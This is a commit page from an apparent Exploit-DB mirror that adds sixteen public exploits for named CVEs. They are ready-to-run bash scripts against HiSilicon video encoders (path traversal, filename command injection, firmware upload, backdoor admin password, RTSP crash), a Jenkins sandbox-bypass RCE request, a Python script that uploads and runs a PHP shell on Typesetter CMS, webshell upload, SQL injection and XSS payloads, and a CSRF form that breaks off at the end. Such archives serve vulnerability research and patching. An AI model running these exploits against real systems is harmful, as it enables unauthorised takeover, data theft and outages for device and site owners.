bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-10-20

Browse source 
16 changes to exploits/shellcodes

Tourism Management System 1.0 - Arbitrary File Upload
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
Online Discussion Forum Site 1.0 - XSS in Messaging System
Online Job Portal 1.0 - Cross Site Scripting (Stored)
HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal
HiSilicon Video Encoders - RCE via unauthenticated command injection
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
HiSilicon Video Encoders - Full admin access via backdoor password
HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)
Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)
Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)
Textpattern CMS 4.6.2 - Cross-site Request Forgery
This commit is contained in:
Offensive Security 2020-10-20 05:02:13 +00:00
parent 97ece9d27b
commit ae14b71248
17 changed files with 808 additions and 0 deletions

24
exploits/hardware/webapps/48899.sh Executable file
View file

@ -0,0 +1,24 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <filepath>"
echo "Example: $0 1.2.3.4:8086 /box/box.ini"
exit 1
fi
curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
|| echo "ERROR: curl returned $?"

28
exploits/hardware/webapps/48900.sh Executable file
View file

@ -0,0 +1,28 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "executing the command... "
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
else
echo "ERROR: $?"
fi

35
exploits/hardware/webapps/48901.sh Executable file
View file

@ -0,0 +1,35 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "creating uk.rar... "
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt
printf "uploading the RAR file... "
if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
rm uk.rar
else
echo "ERROR: $?"
fi

33
exploits/hardware/webapps/48902.sh Executable file
View file

@ -0,0 +1,33 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 1 ]
then
echo "Usage: $0 <server>[:<port>]"
exit 1
fi
printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
if [ "$ret" -eq 0 ]
then
echo "the password is '$password'"
echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
echo "ERROR: curl returned $ret"
fi

43
exploits/hardware/webapps/48903.sh Executable file
View file

@ -0,0 +1,43 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "usage: $0 <server> <RTSP port>"
exit 1
fi
server=$1
port=$2
printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
|| { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"
cseq=$(printf "0%0.s" {1..3000})
printf "sending the payload... "
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"
sleep 1
printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
echo "ERROR: the RTSP server still seems to be running :("
else
echo "SUCCESS: the server is down"
fi

33
exploits/java/webapps/48904.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
# Date: 8th October 2020
# Exploit Author: dmw0ng
# Vendor Homepage: https://www.jenkins.io
# Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip
# Version: Jenkins 2.63
# Tested on: Ubuntu 18.04 / 20.04
# CVE : CVE-2019-1003030
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
Connection: close
Upgrade-Insecure-Requests: 1
URL Encoding the following for RCE
```public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} ```
to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d

67
exploits/php/webapps/48892.txt Normal file
View file

@ -0,0 +1,67 @@
#Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload
#Date: 2020-10-19
#Exploit Author: Ankita Pal & Saurav Shukla
#Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
#Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4
Proof of Concept:::
Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
Step 2: Open Tour Package -> Create
Malicious Request:::
POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713
Content-Length: 1101
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagename"
Pack1
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagetype"
Family
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagelocation"
Manali
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packageprice"
21
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagefeatures"
Free
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagedetails"
Details
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packageimage"; filename="file1.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="submit"
-----------------------------63824304340061635682865592713--

34
exploits/php/webapps/48893.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : tfName
# POC
# Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload.
POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 642
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Upgrade-Insecure-Requests: 1
tfName=<img+src=a+onerror=alert(1)>&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d

30
exploits/php/webapps/48894.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : id
# POC
POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Content-Type: application/x-www-form-urlencoded
Content-Length: 338
username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448

27
exploits/php/webapps/48895.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI.
# Vulnerable Parameter : id
# POC
GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i

17
exploits/php/webapps/48896.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020/10/18
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Proof of Concept:
1 - Go to http://localhost/studentrecord/ url, click "click here to sign in" text and login with the 070101:070101 information.
2 - Then go to http: //localhost/studentrecord/my-profile.php and upload your shell file from the upload new photo section and click the update button.
3 - Finally, open your shell in http://localhost/studentrecord/staffphoto/shell.php

17
exploits/php/webapps/48897.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System
# Google Dork: N/A
# Date: 2020-10-17
# Exploit Author: j5oh
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
The messaging subsystem in the Online Discussion Forum is vulnerable to XSS in the message body. This will execute when viewing the messages page: http://localhost/Online%20Discussion%20Forum%20Site/messages.php.
XSS can be done through the messaging interface, go to http://localhos/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the javascript in the message body. Alternatively, if you know the user id you can just send the message directly thought the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php.
# PoC:
curl -d 'uto=1&tt=<script> alert("XSS"); </script>' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php

17
exploits/php/webapps/48898.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Proof of Concept:
1 - Open URL http://localhost/jobportal/Employer/ManageJob.php
2 - Fill in the blanks with this payload: "><script>alert (1)</script>
3 - And click submit button.

39
exploits/php/webapps/48905.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via
Guardian Name, Guardian Relation, Guardian Contact no, Address, City
# Google Dork: N/A
# Date: 2020-10-08
# Exploit Author: Kokn3t
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system
# Version: V 2.1
# Tested on: Windows 10, Kali 2020.1
# CVE : CVE-2020-25270
######## Attack Vector ########
Install Hostel Management System V 2.1
1) User Module
Login as user and go to "Book Hostel"
(http:/localhost/hostel/book-hostel.php) and start booking.
Add malicious script in these fields - "<script>alert('XSS');</script>"
i. Guardian Name
ii. Guardian Relation
iii.Guardian Contact no
iv. Address
vi. City
After that will get a prompt "Student Successfully register" and after
pressing "See All", XSS will be triggered.
2) Admin Module
Login in as Admin and go to "Management Students", and "View Full details"
of booked student's record, XSS will be triggered also.

211
exploits/php/webapps/48906.py Executable file
View file

@ -0,0 +1,211 @@
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790
######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#
######## Exploit with Poc ########
https://github.com/t0gu/CVE-2020-25790
####### Code #######
# see the poc at https://github.com/t0gu/CVE-2020-25790
import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re
import urllib3
from urllib3.exceptions import InsecureRequestWarning
banner = """
by: t0gu
usage: main.py [-h] -p PASSWORD -l LOGIN -u URL
==> Exploit for CVE 2020-25790
optional arguments:
-h, --help show this help message and exit
-p PASSWORD, --password PASSWORD
==> admin password
-l LOGIN, --login LOGIN
==> admin login
-u URL, --url URL ==> main URL
"""
print(banner)
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()
login = args.login
password = args.password
url = args.url
file = args.file
PROXIES = proxies = {
"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080",
}
class Exploit:
def __init__(self, login, password, url, file):
self.login = login
self.password = password
self.url = url
self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
self.file = open(file, 'rb')
def get_nounce(self):
try:
url = self.url + "/Admin"
r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
data = r.text
soap_obj = BeautifulSoup(data, 'html.parser')
for inp in soap_obj.find_all("input"):
for v in inp:
nounce = v['value']
if nounce != None or nounce != "":
return nounce
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_hash_folders(self):
cookie_auth = self.get_cookies()
hash_verified = self.get_verified()
data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
try:
url = self.url + "/Admin_Finder"
r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
json_data = r.json()
hash_dir = json_data['files'][2]['hash']
return hash_dir
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_cookies(self):
nounce = self.get_nounce()
if nounce:
try:
url = self.url + "/Admin"
data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '',
'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '',
'remember': 'on', 'verified': ''}
r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
cookie_admin = r.headers['Set-Cookie']
cookie_name = cookie_admin.split(':')[0].split('=')[0]
cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]
if cookie_name == None or cookie_name == "":
if cookie_value == None or cookie_value == "":
print("==> Something went wrong while login")
else:
data = f"{cookie_name}={cookie_value};"
return data
except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
print(f'==> Error while login {e}')
def upload_zip(self):
url = self.url + '/Admin_Finder'
hash_verified = self.get_verified()
hash_dir = self.get_hash_folders()
auth_cookie = self.get_cookies()
try:
print(f"==> Uploading file: {self.file}")
data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
r = requests.post(url=url, verify=False, timeout=10,
headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
hash_file = r.json()['added'][0]['hash']
self.extract_file(auth_cookie, hash_file, hash_verified)
except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
print(f"==> Error while uploading {e}")
def extract_file(self, auth_cookie, hash_file, hash_verified):
data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
try:
url = self.url + "/Admin_Finder"
r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
name_file = r.json()['added'][0]['name']
print(f"==> All Hashes are collected from: {name_file}")
self.xpl(auth_cookie,name_file)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def xpl(self, auth_cookie, name_file):
try:
url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
new_url = url.replace("index.php", "")
print(f"==> Try to exploit: {new_url}")
r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
pattern = r'<pre>(.*?)</pre>'
m = re.search(pattern, r.text.replace("\n", ""))
if m is not None and m != "":
print(f"==> Vulnerable: {m.group(1)}")
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_verified(self):
try:
url = self.url + "/Admin/Uploaded"
auth_cookie = self.get_cookies()
r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
data = r.text
pattern_regex = r'"verified":"(.*)"}'
m = re.search(pattern_regex, data)
if m is not None or m != "":
return m.group(1)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
if __name__ == "__main__":
obj = Exploit(login, password, url, file)
obj.upload_zip()

137
exploits/php/webapps/48907.txt Normal file
View file

@ -0,0 +1,137 @@
# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery
# Exploit Author: Alperen Ergel
# Contact: @alpren_ae
# Software Homepage: https://textpattern.com/
# Version : 4.6.2
# Tested on: windows 10 / xammp
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 2020-10-29
######## Description ########
#
# 1-) Loggin administrator page
#
# 2-) Go admin > prefs > site
#
# 3-) All inputs vulnerable to CSRF
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/textpattern/textpattern/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1806
Connection: close
Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40
Upgrade-Insecure-Requests: 1
Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0&
is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7&
use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles&
file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=&
smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4&
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1&
use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1&
include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0&
comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1&
comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=&
custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=&
step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720
### EXPLOIT ####
<html>
<!-- CSRF PoC -->
<body>
<form action="https://localhost/textpattern/textpattern/index.php" method="POST">
<input type="hidden" name="Submit" value="Save" />
<input type="hidden" name="sitename" value="CHANGEHERE" />
<input type="hidden" name="siteurl" value="CHANGEHERE" />
<input type="hidden" name="site&#95;slogan" value="CHANGEHERE" />
<input type="hidden" name="production&#95;status" value="testing" />
<input type="hidden" name="timezone&#95;key" value="Europe&#47;Berlin" />
<input type="hidden" name="auto&#95;dst" value="0" />
<input type="hidden" name="is&#95;dst" value="0" />
<input type="hidden" name="dateformat" value="since" />
<input type="hidden" name="archive&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" />
<input type="hidden" name="permlink&#95;mode" value="section&#95;id&#95;title" />
<input type="hidden" name="doctype" value="html5" />
<input type="hidden" name="logging" value="none" />
<input type="hidden" name="expire&#95;logs&#95;after" value="7" />
<input type="hidden" name="use&#95;comments" value="1" />
<input type="hidden" name="img&#95;dir" value="images" />
<input type="hidden" name="skin&#95;dir" value="themes" />
<input type="hidden" name="file&#95;base&#95;path" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;files" />
<input type="hidden" name="file&#95;max&#95;upload&#95;size" value="2000000" />
<input type="hidden" name="tempdir" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;textpattern&#47;tmp" />
<input type="hidden" name="plugin&#95;cache&#95;dir" value="" />
<input type="hidden" name="smtp&#95;from" value="" />
<input type="hidden" name="publisher&#95;email" value="" />
<input type="hidden" name="override&#95;emailcharset" value="0" />
<input type="hidden" name="enable&#95;xmlrpc&#95;server" value="0" />
<input type="hidden" name="default&#95;event" value="article" />
<input type="hidden" name="theme&#95;name" value="hive" />
<input type="hidden" name="module&#95;pophelp" value="1" />
<input type="hidden" name="default&#95;publish&#95;status" value="4" />
<input type="hidden" name="title&#95;no&#95;widow" value="0" />
<input type="hidden" name="articles&#95;use&#95;excerpts" value="1" />
<input type="hidden" name="allow&#95;form&#95;override" value="1" />
<input type="hidden" name="attach&#95;titles&#95;to&#95;permalinks" value="1" />
<input type="hidden" name="permlink&#95;format" value="1" />
